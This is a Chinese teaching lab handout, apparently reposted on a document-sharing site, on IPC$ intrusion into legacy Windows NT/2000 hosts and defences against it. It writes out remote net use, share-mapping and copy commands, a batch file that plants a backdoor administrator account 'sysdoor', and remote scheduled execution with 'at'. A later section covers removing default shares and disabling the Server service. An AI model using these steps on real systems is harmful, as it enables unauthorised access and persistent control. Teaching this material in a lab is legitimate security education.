《IPC$入侵防御实验》由会员分享,可在线阅读,更多相关《IPC$入侵防御实验(14页珍藏版)》请在金锄头文库上搜索。
1、IPC$入侵和防范实验一、 试验目的:学习使用windows系统自带IPC$有关的的网络管理和控制命令,巩固对所学知识的理解。 二、试验内容:通过使用windows系统自带的IPC$有关的网络管理和控制命令,观看其结果并进行分析,加深对这些工具的理解和灵活运用。三、试验环境: (1)安装WINDOWS NT 或WINDOWS 2000以上版本的操作系统。 (2)已开放IPC$共享。 (3)已知远程主机IP地址。 (4)已知远程主机的管理员帐号和密码(IPC$空连接除外) 其中远程主机所需条件: 1、安装WINDOWS NT 或WINDOWS 2000以上版本的操作系统。 2、已开放IPC$共享
2、。 3、已启动SERVER服务。四、试验步骤: 启动命令行控制台(虚拟机和本地机) 单击“开始”“运行”,在“运行”对话框中键入:“CMD“命令启动命令行控制台。 / 查看IPC$共享是否开放:CmdNet share 在虚拟机上建立用户,并把用户加入administators组中 Net user 用户名 密码 /add Net localgroup administrators 用户名/add Net localgroup adminstrators 建立IPC$连接 在命令行提示符下键入如下命令: Net use IP地址ipc$ “密码”/user:用户名如:Net use IP地址i
3、pc$ “12345”/user:administrator映射网络驱动器 成功建立了IPC$连接后,在命令行提示符下键入命令: Net use 本地盘符 IP地址共享名如:Net use z: 192.168.1.3c$ 该命令的执行结果是将目标主机的C盘映射为本地机的z盘。映射成功后,就可以对目标主机进行操作和控制了。COPY文件 命令格式:Copy 本地文件的路径文件名 远程主机IP远程主机文件路径。如:Copy c:/bake.bat 192.168.1.3c$ 断开IPC$连接 在命令行提示符下键入命令: Net use IP地址IPC$/del思考:如果不知道远程主机的用户名和密码
4、,可以连接上远程主机吗?可以实现以上哪些操作? 留后门 (1)打开记事本编写批处理程序 建立后门的批处理程序为: Net user sysdoor 12345 /add Net localgroup administrator sysdoor /add 其中“Net user sysdoor 12345 /add“命令添加密码为12345的帐号sysdoor。“Net localgroup administrator sysdoor /add” 命令则把sysdoor帐号添加到管理员组中去。 后门程序编写好后,需要起个名字,在我们的实验中将它取名为“bake.bat”。 (2)批处理程序建立好
5、后,我们通过IPC$将它拷贝到目标主机,命令格式为:Copy 本地文件的路径文件名 远程主机IP远程主机文件路径。 Copy c:/bake.bat 192.168.1.3c$ (3)在命令行提示符下键入命令:net time ip,查看系统时间 At 192.168.1.3 14:10 c:bake.bat 断开IPC$连接 在命令行提示符下键入命令: Net use 192.168.1.3IPC$ /del 这条命令的执行结果是断开与远程主机192.168.1.3的IPC$连接。我们也可以用Net use */del断开所有的连接。 IPC$空连接 如果我们要与远程主机192.168.1.
6、3建立IPC$空连接,则在命令行提示符下键入命令: Net use 192.168.1.3 “ ” /user: Ipc$防御试验二IPC$的安全解决方案 删除默认共享(1)在命令符下键入Net share 命令查看系统当前的默认共享。 (2)打开记事本,编写批处理程序,如下: Net share IPC$ /del Net share e$ /del Net share c$ /del Net share d$ /del(3) 保存为delshare.bat(4) 单击C:Documents and SettingsAdministrator开始菜单程序启动,将delshare.bat文件拷
7、贝到它的启动组中。做完前面的事情后,重新启动计算机,然后用Net share 命令验证一下系统中的默认共享资源是否已经被全部删除,如果没有,还有哪些?尝试在本地机中用Net use IP地址ipc$ “密码”/user:用户名的命令是否还能建立IPC$连接? 关闭SERVER服务单击“控制面板”“管理工具”“服务”打开服务管理器,在服务列表中找到“Server”服务,用右键单击该服务,在弹出的菜单中选择”属性“,然后选择”禁止“选项就完成了关闭操作。重启计算机后修改生效。再次验证:尝试在本地机中用Net use IP地址ipc$ “密码”/user:用户名的命令是否还能建立IPC$连接?如果不
8、能,将返回什么错误信息。 给系统设置一个安全的密码IPC$入侵一般都是通过扫描弱口令开始的,一旦入侵者扫描不到任何口令,IPC$入侵就无从谈起。1. 启动命令行控制台(虚拟机和本地机)2. 查看IPC$共享是否开放:3.在虚拟机上建立用户,并把用户加入administators组中4.建立IPC$连接5.映射网络驱动器6.COPY文件7. 断开IPC$连接 8 .(1)打开记事本编写批处理程序,建立后门的批处理程序.(2)批处理程序建立好后,我们通过IPC$将它拷贝到目标主机(3)在命令行提示符下键入命令:net time ip,查看系统时间(4) 断开IPC$ 连接(5)Net use */del断开所有的连接。(6)IPC$空连接Ipc$防御试验二IPC$的安全解决方案1.删除默认共享(1)在命令符下键入Net share 命令查看系统当前的默认共享。(2)打开记事本,编写批处理程序 (3) 保存为delshare.bat(4)将delshare.bat文件拷贝到它的启动组中。(5) 重新启动计算机,然后用Net share 命令(6)验证一下命令是否还能建立IPC$连接?7.1关闭SERVER服务7.2再次验证命令是否还能建立IPC$连接?如果不能,将返回什么错误信息。8.给系统设置一个安全的密码 温馨提示:最好仔细阅读后才下载使用,万分感谢!
